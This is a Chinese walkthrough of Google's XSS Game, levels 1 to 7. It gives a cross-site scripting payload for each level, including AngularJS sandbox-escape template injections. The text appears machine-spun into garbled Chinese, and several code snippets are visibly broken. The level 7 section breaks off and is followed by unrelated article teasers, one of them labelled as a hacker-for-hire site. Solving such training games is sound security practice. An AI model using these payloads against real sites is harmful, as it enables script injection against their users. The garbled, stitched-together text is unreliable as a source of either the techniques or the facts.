本文介绍了怎么完结谷歌最新的XSSGame的进程,完结了这八个应战就有时机取得Nexus 5x。实际上这八个应战整体来说都不难,都是些常见的xss。通关要求是只要能弹出alert窗口即可。
之一关
反射型xss,在搜索框提交的内容终究会出现在成果页面的html代码里,没有任何过滤,直接搜索:
script>alert('freebuf')script>
第二关
仍是反射型,提交内容后会有必定推迟。经过检查html源码能够知道推迟的时刻(timer=)被直接插入到了img标签里的onload事情里:
id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('');" />
直接恳求url:/?timer=’-alert(1)-’,通关。
第三关
展现了一些猫的图片,当图片换了后,url仅仅变化了#后边的内容(#1 > #2),感觉能够经过这个id来反射xss。
检查源代码:
function chooseTab() {
var html = "Cat " + parseInt() + "
";
html += " + + ".jpg' />";
document.getElementById('tabContent').innerHTML = html;
// Select the current tab
var tabs = document.querySelectorAll('.tab');
for (var i = 0; i if (tabs[i].id == "tab" + parseInt()) {
tabs[i].className = "tab active";
} else {
tabs[i].className = "tab";
}
}
window.location.hash = ;
// Tell parent we've changed the tab
top.postMessage({'url': self.location.toString()}, "*");
}
哼,依据上一关的创意,感觉能够持续运用一下on事情,修正id后,图片肯定是不存在的,所以运用onerror:
#1'onerror=alert(1)>
搞定
第四关
翻开后是一个注册页面,让咱们填写邮箱地址,注册完结后经过url里边的next参数把咱们跳转回主页,检查源码:
script>
setTimeout(function() { window.location = user provided>; }, 1000);
script>
在html中,链接能够是js代码,比方:
a href="javascript:...">a>
直接恳求这个跳转url:
confirm?next=javascript:alert(1)
第五关
一个F歌(foogle)搜索框,运用了angular *** 1.5.8,感觉是爆过缝隙的,上某网搜索(angularjs 1.5.8 injection)找到运用办法:
?utm_term=&utm_campaign={{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
第六关
angular *** 1.2版别的搜索框,在搜索框中提交的内容终究进到了class为ng-non-bindable的div标签里:
#一般的div标签
Normal: {{1 + 2}}
#输出:Normal: 3
#ng-non-bindable
Ignored: {{1 + 2}}
#输出:Ignored: {{1 + 2}}
随后发现假如直接提交花括弧会被删掉,所以运用“{”,终究结构这样一个url:
?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
第七关
经过GET(参数menu)和 *** ONP恳求加载了一个博客页面,而呼应的title,pictures会被处理为h1标签和img标签。关卡提示:common CSP bypass。
猜想xss
[1] [2] 黑客接单网
一、CSRF缝隙简介 csrf缝隙的成因便是网站的cookie在浏览器中不会过期,只需不封闭浏览器或许退出登录,那今后只需是拜访这个网站,都会默许你现已登录的状况。而在这个期间,进犯者发送了结构好的c...
近来,闻名硬件黑客Samy Kamkar运用5美元设备打造的黑客东西PoisonTap,只需30秒,就可以攻破设置有恣意暗码的电脑体系,并完成长时间后门装置。PoisonTap不是暴力破解暗码,而是...
HTML5 安全问题解析 标签: html html5 web安全 本文参阅: w3school:html5相关基础知识(w3school.com.cn)...
在布置蜜罐之后,会发作很多的日志,关于要挟情报而言,咱们需求经过这些日志来提取其间的有用的数据,本文将会描述提取那些数据用来完结剖析。 布置蜜罐之后会生成描述发作的事情的日志记载。能够收集到的安全事情...
0×01:简介 在运用GoogleHack进行SQL注入点查询时,手艺的办法一般为经过谷歌语法的inurl判别是否存在动态查询参数,然后对查询的网站url进行手艺判别是否存在SQL注入缝隙,如or 1...
0x00 源起 从3月5日开端,腾讯反病毒实验室监控到很多闻名软件客户端存在开释下载器病毒的反常数据,预示着或许存在经过挂马方法大规模进犯闻名软件客户端的行为。电脑管家紧迫对相关数据进行剖析排查,终究...